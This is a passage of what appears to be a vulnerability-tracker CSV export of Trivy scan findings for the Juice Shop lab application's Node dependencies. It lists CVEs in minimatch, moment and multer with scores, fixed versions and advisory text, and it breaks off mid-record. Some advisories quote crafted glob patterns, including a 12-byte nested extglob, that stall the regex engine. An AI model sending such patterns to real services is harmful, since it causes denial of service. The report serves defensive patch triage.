https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 3.1.2,False,False,,2026-05-12 17:37:05.330008+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,5.1.6,2026-05-12 17:37:05.333511+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/filehound/node_modules/minimatch/package.json,,True,,False,False,,False,,20d59cc010a4d96f2adffd69dde5e7a041667da30b491fa0fe5bdf32938eda0f,162,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.333570+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 5.1.6,False,False,,2026-05-12 17:37:05.333520+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,5.1.6,2026-05-12 17:37:05.337775+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/filehound/node_modules/minimatch/package.json,,True,,False,False,,False,,bd5e209f81d2bddec58406589e997f7c982dc83de1697dd6d8cc65cdd24c19a5,163,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.337832+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 5.1.6,False,False,,2026-05-12 17:37:05.337784+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,5.1.6,2026-05-12 17:37:05.341693+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/filehound/node_modules/minimatch/package.json,,True,,False,False,,False,,dbc2f704ef7bbf4b52e79f8908be650f938f4db9dabb01cd2fa921ab512df9a8,164,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.341782+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 5.1.6,False,False,,2026-05-12 17:37:05.341704+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,9.0.5,2026-05-12 17:37:05.345575+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,1333,2026-05-12,,,"minimatch: minimatch: Denial of Service via specially crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Versions 10.2.0 and below are vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits. The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever. Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This issue has been fixed in version 10.2.1. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/glob/node_modules/minimatch/package.json,,True,,False,False,,False,,5b978f04f9e5ae97c55e236c33598cbcc80e55a260dfca28e530031c2a8fb36b,165,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.345633+00:00,,,,,0,[],"10.2.1, 9.0.6, 8.0.5, 7.4.7, 6.2.1, 5.1.7, 4.2.4, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-26996 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26 NEWLINE https://linux.oracle.com/cve/CVE-2026-26996.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-26996 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-26996,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-26996 Minimatch 9.0.5,False,False,,2026-05-12 17:37:05.345584+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-26996,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,9.0.5,2026-05-12 17:37:05.349397+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,407,2026-05-12,,,"minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/glob/node_modules/minimatch/package.json,,True,,False,False,,False,,b0def4d4e9e17a470db7fa88582551d649cf8911e601a6d816c74f6f29ee9118,166,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.349458+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3",,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2026-27903 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748 NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27903 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27903,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27903 Minimatch 9.0.5,False,False,,2026-05-12 17:37:05.349408+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27903,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],minimatch,9.0.5,2026-05-12 17:37:05.353510+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,1333,2026-05-12,,,"minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4 NEWLINE NEWLINE minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/glob/node_modules/minimatch/package.json,,True,,False,False,,False,,ed2385e08014552518b120e00fbc88f83d3ebe65b8eda9d38b0216c1da8f5f56,167,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.353567+00:00,,,,,0,[],"10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4",,S1,False,,,,,,,,False,https://access.redhat.com/errata/RHSA-2026:7896 NEWLINE https://access.redhat.com/security/cve/CVE-2026-27904 NEWLINE https://bugzilla.redhat.com/2441268 NEWLINE https://bugzilla.redhat.com/2442922 NEWLINE https://bugzilla.redhat.com/2448754 NEWLINE https://bugzilla.redhat.com/2453151 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2441268 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2442922 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2448754 NEWLINE https://bugzilla.redhat.com/show_bug.cgi?id=2453151 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135 NEWLINE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904 NEWLINE https://errata.almalinux.org/9/ALSA-2026-7896.html NEWLINE https://errata.rockylinux.org/RLSA-2026:7896 NEWLINE https://github.com/isaacs/minimatch NEWLINE https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce NEWLINE https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74 NEWLINE https://linux.oracle.com/cve/CVE-2026-27904.html NEWLINE https://linux.oracle.com/errata/ELSA-2026-8339.html NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2026-27904 NEWLINE https://www.cve.org/CVERecord?id=CVE-2026-27904,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2026-27904 Minimatch 9.0.5,False,False,,2026-05-12 17:37:05.353519+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2026-27904,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],moment,2.0.0,2026-05-12 17:37:05.357837+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,400,2026-05-12,,,"nodejs-moment: Regular expression denial of service NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 2.19.3 NEWLINE NEWLINE The moment module before 2.19.3 for Node.js is prone to a regular expression denial of service via a crafted date string, a different vulnerability than CVE-2016-4055. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/express-jwt/node_modules/moment/package.json,,True,,False,False,,False,,dac1e6f8286e134b82dcda08827e835bce97ee1a9e8ac6cacff68f9ec4ccf6a8,168,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.357917+00:00,,,,,0,[],2.19.3,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2017-18214 NEWLINE https://github.com/advisories/GHSA-446m-mv8f-q348 NEWLINE https://github.com/moment/moment NEWLINE https://github.com/moment/moment/commit/69ed9d44957fa6ab12b73d2ae29d286a857b80eb NEWLINE https://github.com/moment/moment/issues/4163 NEWLINE https://github.com/moment/moment/pull/4326 NEWLINE https://nodesecurity.io/advisories/532 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2017-18214 NEWLINE https://ubuntu.com/security/notices/USN-4786-1 NEWLINE https://www.cve.org/CVERecord?id=CVE-2017-18214 NEWLINE https://www.npmjs.com/advisories/532 NEWLINE https://www.tenable.com/security/tns-2019-02,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2017-18214 Moment 2.0.0,False,False,,2026-05-12 17:37:05.357848+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2017-18214,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],moment,2.0.0,2026-05-12 17:37:05.361546+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N,7.5,,,22,2026-05-12,,,"Moment.js: Path traversal in moment.locale NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 2.29.2 NEWLINE NEWLINE Moment.js is a JavaScript date library for parsing, validating, manipulating, and formatting dates. A path traversal vulnerability impacts npm (server) users of Moment.js between versions 1.0.1 and 2.29.1, especially if a user-provided locale string is directly used to switch moment locale. This problem is patched in 2.29.2, and the patch can be applied to all affected versions. As a workaround, sanitize the user-provided locale name before passing it to Moment.js. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/express-jwt/node_modules/moment/package.json,,True,,False,False,,False,,362f998148c58f245982ed840bda60c6fb1bc650b3e099823e8c6dd829c2fced,169,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.361599+00:00,,,,,0,[],2.29.2,,S1,False,,,,,,,,False,https://access.redhat.com/security/cve/CVE-2022-24785 NEWLINE https://github.com/moment/moment NEWLINE https://github.com/moment/moment/commit/4211bfc8f15746be4019bba557e29a7ba83d54c5 NEWLINE https://github.com/moment/moment/security/advisories/GHSA-8hfj-j24r-96c4 NEWLINE https://lists.debian.org/debian-lts-announce/2023/01/msg00035.html NEWLINE https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q NEWLINE https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q/ NEWLINE https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5 NEWLINE https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5/ NEWLINE https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q NEWLINE https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2022-24785 NEWLINE https://security.netapp.com/advisory/ntap-20220513-0006 NEWLINE https://security.netapp.com/advisory/ntap-20220513-0006/ NEWLINE https://security.netapp.com/advisory/ntap-20241108-0002 NEWLINE https://security.netapp.com/advisory/ntap-20241108-0002/ NEWLINE https://ubuntu.com/security/notices/USN-5559-1 NEWLINE https://www.cve.org/CVERecord?id=CVE-2022-24785 NEWLINE https://www.tenable.com/security/tns-2022-09,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2022-24785 Moment 2.0.0,False,False,,2026-05-12 17:37:05.361554+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2022-24785,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],multer,1.4.5-lts.2,2026-05-12 17:37:05.369267+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,401,2026-05-12,,,"Multer vulnerable to Denial of Service via memory leaks from unclosed streams NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 2.0.0 NEWLINE NEWLINE Multer is a node.js middleware for handling `multipart/form-data`. Versions prior to 2.0.0 are vulnerable to a resource exhaustion and memory leak issue due to improper stream handling. When the HTTP request stream emits an error, the internal `busboy` stream is not closed, violating Node.js stream safety guidance. This leads to unclosed streams accumulating over time, consuming memory and file descriptors. Under sustained or repeated failure conditions, this can result in denial of service, requiring manual server restarts to recover. All users of Multer handling file uploads are potentially impacted. Users should upgrade to 2.0.0 to receive a patch. No known workarounds are available. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/multer/package.json,,True,,False,False,,False,,bd7c5d742836d0352509a8474ed0a0c95c51a5a63381ad5fc8f27b95701c4f33,171,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.369324+00:00,,,,,0,[],2.0.0,,S1,False,,,,,,,,False,https://github.com/expressjs/multer NEWLINE https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665 NEWLINE https://github.com/expressjs/multer/pull/1120 NEWLINE https://github.com/expressjs/multer/security/advisories/GHSA-44fp-w29j-9vj5 NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-47935,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2025-47935 Multer 1.4.5-lts.2,False,False,,2026-05-12 17:37:05.369276+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-47935,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],multer,1.4.5-lts.2,2026-05-12 17:37:05.373195+00:00,CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H,7.5,,,248,2026-05-12,,,"Multer vulnerable to Denial of Service from maliciously crafted requests NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 2.0.0 NEWLINE NEWLINE Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.0 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed multi-part upload request. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to version 2.0.0 to receive a patch. No known workarounds are available. NEWLINE ",False,,,False,,,,False,juice-shop/node_modules/multer/package.json,,True,,False,False,,False,,d54a393560504cbe27d8c6511ce8e775584da954e8e529f7c193cdc23ade5220,172,fixed,False,,False,2026-05-12 17:37:04.706300+00:00,Admin User (admin),1,2026-05-12 17:37:05.373249+00:00,,,,,0,[],2.0.0,,S1,False,,,,,,,,False,https://github.com/expressjs/multer NEWLINE https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665 NEWLINE https://github.com/expressjs/multer/issues/1176 NEWLINE https://github.com/expressjs/multer/security/advisories/GHSA-4pg4-qvpc-4q3h NEWLINE https://nvd.nist.gov/vuln/detail/CVE-2025-47944,Admin User (admin),1,,,False,,,,,,,High,,,30,30,2026-06-11,2026-06-11,,,,True,,Trivy Scan,3,0,CVE-2025-47944 Multer 1.4.5-lts.2,False,False,,2026-05-12 17:37:05.373203+00:00,,True,,,,Trivy Scan,1,Labs Security Testing,1,Juice Shop,,CVE-2025-47944,lang-pkgs; node-pkg,"Active, Verified", +,,True,0,[],multer,1.4.5-lts.2,2026-05-12 17:37:05.376708+00:00,,,CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N,8.7,248,2026-05-12,,,"multer: Multer vulnerable to Denial of Service via unhandled exception NEWLINE **Target:** Node.js NEWLINE **Type:** node-pkg NEWLINE **Fixed version:** 2.0.1 